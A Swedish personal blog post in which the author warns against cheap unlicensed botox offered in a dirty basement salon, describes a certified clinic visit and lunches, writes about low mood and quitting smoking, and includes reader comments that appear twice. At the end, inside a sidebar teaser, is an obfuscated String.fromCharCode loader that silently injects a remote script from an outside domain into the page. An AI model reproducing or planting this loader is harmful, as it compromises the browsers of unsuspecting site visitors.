Att göra eller att inte göra! Varning för smutsig botox i källaren! -Big no no!

IMG_1342

 

Hej!

Lördag… solen skiner över Sigtuna. Jag är trött idag. Trött och ledsen. Jag låter det stanna där just nu.

För ett par dagar sedan så kom Åza upp från Småland. SÅ skönt med någon som pratar riktig småländska! Vi skulle göra en grej på EBK. Jag visade bla upp mitt ärr efter magoperationen. jag har skjutit upp på min korrigering som behöver göras. Men som sagt, idag är jag låg. Så vi tar mer om det i ett senare inlägg. Jag och Åza sprang ca 7 kvarter för att hinna upp till Eriksbergskliniken i tid.

Vi rusade in och kraschade med dunder och brak när vi väl kom fram.  Vi han preciiiis i tid. Förökar mig på ett tveksamt leende samtidigt som svetten rinner längs med ryggen….. Men vad gör man inte för att komma i tid när man ägnat ca 35 min åt att leta parkering (saknar småstaden ibland… ) 

IMG_1344

En mysig lunch med Åza innan vi skiljdes åt för att gå på möten på olika håll. Åza är en bra tjej hon <3 Vi pratar i telefonen i stort sett varje dag. Men träfas inte lika ofta… Även om v reser en del tillsammans. 

IMG_1345 IMG_1346

 

Ser du dekalen nedan… ”Certifierad för estetisk injicering”

VET du hur många som sätter både botox och  fillers utan detta??Tyvärr alldeles för många.

Jag var och  gjorde spraytån för ett tag sedan. Googlat upp något ställe, bokade spontant och gick dit. Trevlig personal mötte upp mig, jag blev ombedd att följa med ner i källaren. Sett var vid Stureplansområdet så INTE i någon miner otrygg förort.

Nere i källarn var det skitigt. Det påminde om ett ryskt fängelse man kan se i filmer där det sker sex-handel med minderåriga. USCH! jaja tänkte jag…  Jag är för gammal för sådant ända mål, och har nog tittat liiite för mycket på film.

Jag gjorde min spraytan. Ingen hudlotion som jag är van att man får smörja in armbågar och händer med, inga ”engångs trosor” inget hår skydd. Smutsiga handdukar, smutsigt golv, smutsiga redskap.

Jag försökte tänka positivt. ”Alla är olika, det ser säkert mycket värre ut än vad det är” osv.

När vi var klara så gick jag ut och mötte en annan kvinna. Hon hälsade glatt, hon frågade om jag vill göra botox och fillers när jag ändå var där. (WHAT??!) Ser det ut som att jag behöver det? Frågar man ens en sådan sak, bara sådär när man ,möter en främling?!

Hmm, jag frågade henne vad hon jobbade med. Hon svarade att hon är frisör men sätter sprutor vid sida om, och erbjöd mig en behandling för 2000:-.

jag som av ren nyfikenhet vill fördjupa mig i frågan frågar då ”Vad ingår då?”. Tjejen svarar, ”Allt, välj själv…. hela ansiktet, typ du bestämmer själv. 

Jag svarade artigt, men bestämt.  -Tack, men nej tack, det är inte riktigt min grej.

Jag var HELT CHOCKAD! Tänka alla unga naiva tjejer/flickor som får samma erbjudanden som jag fick! -BIG NO NO!  

OM man väljer att göra liknande behandlingar så MÅSTE man gå till en riktig och omskriven klinik!

Jag dömmer ingen, alla väljer själva vad man vill göra och inte göra. Men gå inte ner i någon smutsig källare för att det är billigt! Du vet inte vad du får i dig, du kan bli sjuk, vanskapt och få men för livet…. bara en tanke från mig till dig <3

Leta efter detta certifikat som Eriksbergskliniken har.  Det ska bli spännande att se när och vad vi ska göra med min mage. Förklarar som sagt det i ett senare inlägg… 

IMG_1350 IMG_1353

IMG_1354 IMG_1406

 

Lunchmöte med Magnus igår. Vi diskuterade lite kring framtidsplaner och Better You. Mycket spännande på gång 😉 Vi åt lunch på Melanders som ligger intill Vasaparken. Älskar den resturangen. Mest känd för sin fisk och sina skaldjur. Men köttbullarna är outstanding, så jag går dit för deras skull…  

IMG_1407 IMG_1408 FullSizeRender IMG_1410 IMG_1411Jag är låg, trött och ledsen idag. En natt med minimal sömn och ångest. Drömde om butiken, årets Skördefest närmar sig. jag drömdes att jag hade perosonmlmöte, men ingen kom. Vaknade upp helt förtvivlad.

 Ännu en gång står jag inför stora, jobbiga beslut att ta. Inte som konkursen. På ett helt annat sätt. Men där känslor är inblandade. Där jag kanske för förda gången VERKLIGEN behöver stå upp för mig själv. OCH för rätt och fel….

Jag vill inte, jag borde inte behöva göra det. Jag vill stå över. Jag vill fokusera på mig själv, min återhämtning och på att må bra…

Vi får se. Vi hörs senare, eller kanske imorgon. Tack för att DU finns <3

Kram  / My Martens

PS Rökningen går JÄTTE bra, jag håller nollan nu. Men des hjälpmedel. Trots att jag som idag när jag inte mår bra, brukar falla dit igen, så gör jag inte det. Inte denna gången! Jag har gjort misstag tidigare, flera gånger. MEN, nollan ska förbli, mer om det i ett annat inlägg… 

32 Komentarer

 1. Kämpa på tjejen! Det är en stor vinst för hela dig om du fortsätter rökstoppet. Du slipper det där gråa filtret över ansiktet som börjar dyka upp i 40 års åldern om man fortsätter röka. Kan se direkt på en bloggares bilder om den personen smygröker eller inte ? Så kämpa på! Och angående dagens mående så kommer det att komma bättre dagar! Kram! ?

 2. Om du behöver göra en korrigering, varför gör du den då inte hos kirurgen som gjort din mage? Om något inte blev som tänkt så ingår korrigering.

  • Jag behöver göra en korrigering. Jag var hos Dr Tuve på Citadell kliniken i Landskrona. Men nu i våras, när jah skulle gjort det sp prioroterade jag bort det. Butiken, och allt som rörde den och konkursen låg i fokus. Vi för se om jag gör den hör uppe eller nere i Landskrona. Det hade vart skönare att göra det här, det 150 mil tur/retur härifrån. Men vi får se ? som sagt, det kommer ett helt inlägg om mina tanke kring detta..

 3. Hej! Första kommentaren sen du uppgav både mitt för o efternamn. Tänkte se hur bloggen e nu, men jisses vad skrivfel du har! Detta kan du inte bero på dyslexin, utan du har alldeles för brått när du skriver o KAN INTE läsa igenom inlägget. När jag skrev om att du lagt ut hela namnet, så var jag plötsligt en sån, som bara skrev o klagade? Detta trots att jag endast sen KK stöttat o peppat dig? Nä, du e skum o har för vana att lägga ut mailadresser, gillar att ha makt va? För när jag försvarar mig, kommer inte kommentaren igenom. Vilket säkert denna inte gör. Det kommer att bli fler o fler som slutar läsa den. Som sagt, detta var bara en engångsföretelse.

 4. Kämpa på tjejen! Det är en stor vinst för hela dig om du fortsätter rökstoppet. Du slipper det där gråa filtret över ansiktet som börjar dyka upp i 40 års åldern om man fortsätter röka. Kan se direkt på en bloggares bilder om den personen smygröker eller inte 🙂 Så kämpa på! Och angående dagens mående så kommer det att komma bättre dagar! Kram! 🙂

 5. Om du behöver göra en korrigering, varför gör du den då inte hos kirurgen som gjort din mage? Om något inte blev som tänkt så ingår korrigering.

  • Jag behöver göra en korrigering. Jag var hos Dr Tuve på Citadell kliniken i Landskrona. Men nu i våras, när jah skulle gjort det sp prioroterade jag bort det. Butiken, och allt som rörde den och konkursen låg i fokus. Vi för se om jag gör den hör uppe eller nere i Landskrona. Det hade vart skönare att göra det här, det 150 mil tur/retur härifrån. Men vi får se 🙂 som sagt, det kommer ett helt inlägg om mina tanke kring detta..

 6. Varje dag kan ju inte vara toppen, då skulle vi ju inte veta vad toppenbra dagar är.. vad som än är jobbigt i dag så låt det vara så, lev i det, även det är ju en del av det som är DU. Jag som bara läser om det du skriver kan tycka att du gjort en mega vändning till det bättre, dragit upp dig själv så ini helskotta bra så det är ju helt normalt att få känna sig lite låg mot för under ytan som du levde förut… och det finns säkert en anl. till att ni har reflektionsdagar på utbildningen också, det händer ju en massa saker känslomässigt som du kanske inte hinner ta hand om då det är som mest i skolan? Kram och var glad över att du vågar känna.

  • Vad glad jag blev att du påminde mig om att jag gjort en förändring till det bättre. Jag behövde verkligen höra det. Idag är ingen bra dag, du har en poäng. I skolan är det full fart och fullt fokus… Jag ger inte Mina egna känslor något utrymme just då…. Så nu med några dagar ledig från skola, och mer jobb. Så kommer tiden för reflektion… Tack! Kram

 7. Duktig tjej som håller nollan! Wow! Det där du berättar om botox är skrämmande, sättet hon framförde det på för tala för sig själv… men yes, tänk på alla unga tjejer och killar som nappar. Minns själv när jag var ung och fick mina läppar tatuerade (ifyllda de skulle liksom se mer ”naturligt” röda ut) Det som hände var att de blev ett stort sår, tack och lov har jag bra läkekött, när skorpan ramlade av (och jag lidit tillräckligt) var läpparna tillbaka till det normala, medan den klåfingriga hudterapeuten hade gjort sig en rejäl hacka med pengar… Jag skämdes, och berättade aldrig för någon vad jag gjort, eller anmälde henne. Idag gör jag botox, alltid hos licenserade läkare. Kram!

  • Men guuuuuud vilken tur du hade! Ja, det är verkligen skrämmande…. Man får vara på sin vakt och bara vända sig till kompetenta och licensierad människor oavsett bransch… Kram

 8. Hej! Första kommentaren sen du uppgav både mitt för o efternamn. Tänkte se hur bloggen e nu, men jisses vad skrivfel du har! Detta kan du inte bero på dyslexin, utan du har alldeles för brått när du skriver o KAN INTE läsa igenom inlägget. När jag skrev om att du lagt ut hela namnet, så var jag plötsligt en sån, som bara skrev o klagade? Detta trots att jag endast sen KK stöttat o peppat dig? Nä, du e skum o har för vana att lägga ut mailadresser, gillar att ha makt va? För när jag försvarar mig, kommer inte kommentaren igenom. Vilket säkert denna inte gör. Det kommer att bli fler o fler som slutar läsa den. Som sagt, detta var bara en engångsföretelse.

 9. Varje dag kan ju inte vara toppen, då skulle vi ju inte veta vad toppenbra dagar är.. vad som än är jobbigt i dag så låt det vara så, lev i det, även det är ju en del av det som är DU. Jag som bara läser om det du skriver kan tycka att du gjort en mega vändning till det bättre, dragit upp dig själv så ini helskotta bra så det är ju helt normalt att få känna sig lite låg mot för under ytan som du levde förut… och det finns säkert en anl. till att ni har reflektionsdagar på utbildningen också, det händer ju en massa saker känslomässigt som du kanske inte hinner ta hand om då det är som mest i skolan? Kram och var glad över att du vågar känna.

  • Vad glad jag blev att du påminde mig om att jag gjort en förändring till det bättre. Jag behövde verkligen höra det. Idag är ingen bra dag, du har en poäng. I skolan är det full fart och fullt fokus… Jag ger inte Mina egna känslor något utrymme just då…. Så nu med några dagar ledig från skola, och mer jobb. Så kommer tiden för reflektion… Tack! Kram

 10. Duktig tjej som håller nollan! Wow! Det där du berättar om botox är skrämmande, sättet hon framförde det på för tala för sig själv… men yes, tänk på alla unga tjejer och killar som nappar. Minns själv när jag var ung och fick mina läppar tatuerade (ifyllda de skulle liksom se mer ”naturligt” röda ut) Det som hände var att de blev ett stort sår, tack och lov har jag bra läkekött, när skorpan ramlade av (och jag lidit tillräckligt) var läpparna tillbaka till det normala, medan den klåfingriga hudterapeuten hade gjort sig en rejäl hacka med pengar… Jag skämdes, och berättade aldrig för någon vad jag gjort, eller anmälde henne. Idag gör jag botox, alltid hos licenserade läkare. Kram!

  • Men guuuuuud vilken tur du hade! Ja, det är verkligen skrämmande…. Man får vara på sin vakt och bara vända sig till kompetenta och licensierad människor oavsett bransch… Kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/